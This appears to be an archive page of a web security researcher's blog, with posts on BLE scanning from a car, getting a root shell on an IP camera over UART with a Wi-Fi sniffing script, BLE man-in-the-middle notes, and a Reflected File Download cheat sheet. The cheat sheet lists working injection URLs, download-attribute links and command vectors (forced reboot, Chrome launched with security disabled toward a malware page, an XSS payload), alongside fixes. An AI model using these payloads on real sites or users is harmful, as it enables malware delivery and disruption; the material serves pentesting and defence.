David Sopas – Web Security Researcher
Home   ›  Archive by Category "Papers"

Papers

29/12/17 Papers # , , , ,

BLE Driving 101

I’m writing this article on my path of becoming a better researcher on IoT devices.
My goal was to create a portable device that I could use to scan BLE (aka Bluetooth Low Energy) devices and improve future tasks – like pentesting IoT for clients.

Disclaimer: No harm or malicious activities have been done to any device. Don’t use this type of information to do illegal stuff.

I used bleah (props to evilsocket) to record all the BLE devices on a car drive. Keep in mind that BLE has a max. range of around 100 meters (on open space) but the cheap adapter that I used had a range of 20 to 50 meters.
So first things first right? Modify my dongle.

I had the HUGE help of kripthor and we started by disassembling the device and identify where the antenna was.

We removed the connection and, after a few tries, we connected the external antenna of a old IP cam. Because the PCB was too small and the wires could break when we connect the device, we used a solder wire plastic holder (as a case) to have it all together and connected everything with chinese glue gun 🙂

This was the final result.

On the left you have a original dongle and in the right the mean mother f*cker dongle!

What I noticed… Better range and signal. I did a couple of tests using my own wearable and than my friend Paulo enters the scene to hold his watch in a open space.

Original dongle
80 meter range didn’t detect it
60 meter range -117dBm (sometimes didn’t detect it)
30 meter range -84dbm
10 meter range -76dbm

Mean mother f*cker dongle
100 meter range -92 dBm
60 meter range -84dBm
30 meter range -76dbm
10 meter range -71dbm

Now that I have a better dongle 😀 I had it to my portable configuration:

1x CSR 4.0 bluetooth adapter
1x Raspberry Pi 2 model B with a acrylic case (running Raspbian)
1x Powerbank

Devices found

Vendors that allowed connections ✓:
53x Unknown vendors
10x Samsung Electronics Co.
4x Apple
2x Polar Electro Oy
2x Samsung Electro-mechanics(thailand)
1x Texas Instruments
1x Google
1x Huawei Technologies Co

Totalling 74 devices in a 2.4km car drive across the city. On the unknown vendors I saw a couple of chinese wearables, Tiles, Bike GPS, etc:

Next step is to check popular areas, eg: running or bikes race events. That would pick lots of BLE devices.

0 likes 2 responses
04/12/17 Papers # , , ,

Using UART to connect to a chinese IP cam

This blog post has been created for completing the requirements of the SecurityTube Offensive Internet of Things course.

http://www.securitytube-training.com/online-courses/offensive-internet-of-things-exploitation/index.html

Student ID: IoTE- 766

Following my interest in going deeper on IoT – specially on hardware hacking, I grabbed a chinese IP cam – Loftek and started checking its internals. I already had researched the web application itself and the mobile app for Checkmarx but now I wanted something different.

My main goal was to find a serial port where I could connect to my laptop and see where it takes me. I was really hoping for root access…

After identifying the components I got what I wanted. A UART connection in J2 that I hoped that allowed me to create a serial communication. In this case it was pretty easy to identify them because they were printed on the PCB – RX – TX – GND – VCC (5V).

I grabbed a couple of pins and started soldering them to the RX – TX – GND. This last one was not very well positioned because the pin holes were very close to each other.

Now the fun part. Connect to my laptop. I used 3 jumper cables and the Attify Badge.

RX – D0
TX – D1
GND – GND

Next step, detect the baudrate for the communication. I used the python script from Craig Heffner on Kali Linux and it returned:

In the following case I used screen but you can also use minicom – with the previous detected baudrate:

And guess what! A root shell dropped in the console.

Other interesting thing that I already did on a previous research was to use this IP camera to sniff the network.  What I did was to install a tcpdump binary and created a small script:

#!/bin/bash
ifconfig ra0 down
iwconfig ra0 mode monitor
ifconfig ra0 up
./tcpdump -i ra0 --monitor-mode -w cap.cap &
sleep 30
killall tcpdump
ifconfig ra0 down
iwconfig ra0 mode managed essid network-2g key s:myKeyto_Wifi
ifconfig ra0 up

After a while I got few hits on the Wireshark that allow me to see people using Dropbox inside the network and some other services:

LLMNR/NBNS Poisoning anyone? 🙂

I hope to continue my path on hardware hacking because it’s really fun. Don’t forget also to check my BLE article where I wrote my notes on this “smart bluetooth” thing.

0 likes no responses
30/09/17 Papers , Tips and Tricks # , , , , ,

My notes on Hacking BLE – list of resources

My notes on Hacking BLE – list of resources

In the last few weeks I went for a drive into the Bluetooth Low Energy (aka BLE) topic.
There are many articles on the web on “how to hack BLE” and stuff like that, so this is just a compilation of the things I wrote on my notepad and my decision of sharing it with the community.

In a nutshell, what I did… Bought some cheap BLE devices and played around.

I start by scanning the device. Do some recon on it and then check what I can get from it. Sniffing, RE the mobile app, MiTM, etc.
At first I always scan for devices and enumerate the services and characteristics. BLEAH could be a good choice.

I tried different techniques but the one that I got better results was MiTM.
Sniffing in my opinion you need luck. Even if you have three Ubertooth covering all three advertisement channels – Uberteeth 🙂 you still need lots of luck and a faraday cage

For MiTM I use GATTacker. My lab is powered by a laptop with Kali installed and a Raspberry, with Raspbian installed. One is the central and the other is the peripheral. The rest is quite simple:

  1. Start the central
  2. Scan for devices
  3. Grab the device ID and scan the services and characteristics
  4. Send advertisements
  5. Turn on the bluetooth on your phone and run the mobile app
  6. Modify the dump file
  7. Replay
  8. Gameover

Eg of a smart lock showing the master key and my own key (in plaintext):

I’m still learning but I’m enjoying every step.

Some tips I learned along the way:

  • Start by reading specification (core and GATT) and learn how it works
  • Sometimes you need to change your bdaddr (MAC addr) to match the original device
  • Study the hardware and check what kind of approach is better (sniffing, MiTM, brute-forcing, etc)
  • You learn a lot by RE the mobile application
  • By reversing don’t forget to search for specific keywords – liked password, CMD, secret and stuff like (sometimes you get some low hanging fruits)
  • For alternative sniffing, use Android Bluetooth HCI snoop log
  • Be persistent, don’t give up on first sign of fail

Resources

Must read

Hardware

Tools

Talks

I hope this article helps out newcomers in this BLE hacking and also help pros with a list of interesting material.
Feel free to send me more resources, I’ll keep updating.

Meanwhile follow me on Twitter – @dsopas to get the latest updates on my work.

0 likes no responses
06/10/15 Papers # , , , ,

Reflected File Download Cheat Sheet

Reflected File Download Cheat Sheet

This article is focused on providing infosec people how to test and exploit a Reflected File Download vulnerability – discovered by Oren Hafif of Trustwave. This vulnerability is not very well known but if well implemented could be very dangerous.
I’ve been writing security reports on RFD since January 2015 (most still undisclosed) and found lot’s of interesting things based on that experience that I would like to share.
I’m not explaining in this cheat sheet what RFD is or make a fancy presentation about it. For that you have Oren Hafif Blackhat presentation and Trustwave paper.

 

0x1 Where to look

Most of the RFD attacks are found on JSON and JSONP APIs [like auto-complete, user information, search box, order filters, etc.]. Most modern web applications this days use it.
You should start looking into your proxy [Burp, ZAP, etc] or Google Inspector for XHR requests. They’re are usually the prime suspect to find RFD attacks.
Don’t discard other requests like scripts. I already found a RFD attack on a JS file on Google which got me a entry on their Hall-of-Fame.
So keep your eyes open and think outside-the-box.

 

0x2 How to test it

Try to see if a callback parameter is present on the request:

https://www.example-site.pt/api/search?term=f00bar&callback=jQuery_1234

If callback is present try to change it to calc.

https://www.example-site.pt/api/search?term=f00bar&callback=calc

If calc is reflected on the screen it’s a good thing. If not maybe the victim has a whitelist of callbacks. But don’t give up yet. Try to find other parameter that could be reflected.
In my example you can see term parameter. Try to inject the following search term:

"||calc||

If the double-quote is slashed and pipe chars are not encoded you got the attack reflected.

https://www.example-site.pt/api/search?term="||calc||&callback=calc

Important: Even if the callback is not present in the request try to inject it. Most of the cases it’s there 🙂

If you can’t inject a callback try to inject the vector on another parameter that is reflected. Take in mind that it should be accessible to anyone not only by you. No Self-RFD in here 🙂

Ok so you have a reflected callback or reflected injected parameter. What we’ll try next is filename manipulation if URL mapping is permissive.

Some things you might try:

https://www.example-site.pt/api/search.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search/setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;/setup.bat?term=f00bar&callback=calc
https://www.example-site.pt/api/search;/setup.bat;?term=f00bar&callback=calc

You can use other extensions also. Use your imagination. You can use .bat, .cmd, .js, .vbs and even other formats to attack *nix users – http://blog.davidvassallo.me/2014/11/02/practical-reflected-file-download-and-jsonp/

 

0x3 Can’t get download dialog

If the server don’t have Content-Disposition: attachment header to force the download you must use HTML5 download attribute to do this. On Internet Explorer 8 and 9, which interpret JSON as attachment, it will automatically try to download.

HTML5 download attribute is available in the following browsers:

  • Chrome
  • Firefox (you need to hack it a little to work)
  • Opera

Example 1:

<a href="https://www.example-site.pt/api/setup.bat?callback=chkdsk" download="setup.bat">Download</a>;

In Example 1 you can just click the link Chrome and Opera will download search.bat. On Firefox you must force the “Save link as” by adding on the:

<a href> onclick="return false;"

Example 2:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat">Download</a>;

Just by clicking on the Download link Chrome and Opera will download setup.json. You must force the download with “Save link as” like Firefox. So:

<a href="https://www.example-site.pt/api/setup.json?callback=chkdsk" download="setup.bat" onclick="return false">Download</a>

Reminder: Keep noticing what is the returned HTTP code. It must be 200. 401 and 403 will not lead to RFD attacks.

 

0x4 Real Scenarios (all of them fixed)

Desk @ http://www.davidsopas.com/desk-com-reflected-filename-download/

Desk web app allowed a malicious user to have a direct URL to a malicious download.
Because they had Content-Disposition: attachment header this URL:
https://support.desk_com_client.com/customer/portal/articles/autocomplete.bat?&term=calimdshd&callback=||start%20chrome%davidsopas.com/poc/malware.htm||

Worked in every browser – downloading it without using any other manipulation. An example of a perfect RFD attack.

Acunetix @ https://www.davidsopas.com/acunetix-got-rfded/

Needed to use a special crafted webpage to download the file so this one it’s a nice example of the HTML5 download attribute.

Google @ http://www.websegura.net/advisories/reflected-filename-download-on-google/

This one is to show you guys that you don’t need a JSON file to get a RFD attack. Even a JS file which reflects your information will do the job.

 

0x5 RFD vectors

If you want to just give a proof-of-concept to a vendor you can just use a innocent calc from Windows or open a Chrome window with your site.
If you want to demonstrate with other vectors I give you a small list:

  • calc [runs Windows calculator]
  • chkdsk [runs Windows check disk utility]
  • start chrome davidsopas.com/poc/malware.htm [open a new chrome window with the defined URL]
  • start chrome davidsopas.com/poc/malware.htm –disable-web-security –disable-popup-blocking [open a new chrome
  • window with security options disabled with the defined URL]
  • shutdown -t 0 -r -f [force a Windows immediate reboot]

Don’t forget that you can use any command you wish depending on the operating system of the victim.

 

0x6 Bonus tricks

  • Sometimes you may enconter callbacks being filtered for spaces and special chars. If this is the case you can always use a RFD vector that fits this filtering (check 0x5 RFD vectors).
  • If the executable file is a .bat file don’t forget that there’s a limit on it’s content. If the JSON file you are using is too big, the batch file will not run your RFD attack. Try removing some of the parameters to reduce the lenght of the file.
  •  JSON/JSONP error messages sometimes could be your best friend. Some of them reflect the parameters you inject and return a HTTP 200 code.
  • If request header accepts text/html and tags are not filtered you can try inject a callback with HTML and make it a Reflected XSS:

https://www.example-site.pt/api/search.htm?term=f00bar&callback=calc<svg onload=prompt(1)>

  • If you can’t get a reflected vector on the request and you have a URL which is accessible to authenticated users you can use fields to inject the RFD vector.
    Example:

https://www.example-site.pt/1/members/dsopas

{"id":"1234567", "name":"David Sopas"}

You can inject your RFD vector:

"||calc||

on your name and use your link to attack.

{"id":"1234567", "name":"\";||calc||"}

This shows that sometimes you don’t even need the callback or parameter on the URL to use a RFD attack.

  • If your .bat don’t run, copy-paste it’s content to cmd.exe and check what it’s going on.
  • Sometimes when you call the XHR URL directly it shows you the file in XML. Add ?format=json and you might get lucky!

 

0x7 How to fix it

I think the best solution is to use the header Content-Disposition with a defined filename:

Content-Disposition: attachment; filename=1.txt

That way it’s impossible (so far) to modify the filename and most important filename extension.
Also if you use callbacks try to whitelist them. Finally encode (not escape) values reflected on the request.

 

0x8 Affected sites/companies

Should I be worried about RFD? YES!
Imagine a way of tricking victims into downloading a malicious filename using your domain? It’s very important to think that this is not a social-engineering attack but it only uses part of it (abusing human-factor) to gain trust of your client into downloading a file [that you didn’t upload]
If your client or visitor is not a security expert and is just a normal Internet user he will trust the link, download the file and execute it. People are doing this even without the trusted domain imagine with that option.

Oren Hafif said in his BlackHat presentation:

4 out of 5 would trust downloads based on the hosting domain.
RFD uses trust to do evil.

My advice is… Patch it before it too late.

 

0x9 Thanks

Oren Hafif -> for discovering this type of vulnerability
David Vassallo -> for showing a *nix version of the RFD attack
Ashar Javed -> for giving me the idea of publishing this cheat sheet about RFD and for calling me “RFD Machine” 🙂

 

0xA Other related Reflected File Download links

0 likes 2 responses
Recent Posts
Recent Comments
Archives
Categories
Copyright © 2015. DavidSopas.com - Follow this blog updates by RSS.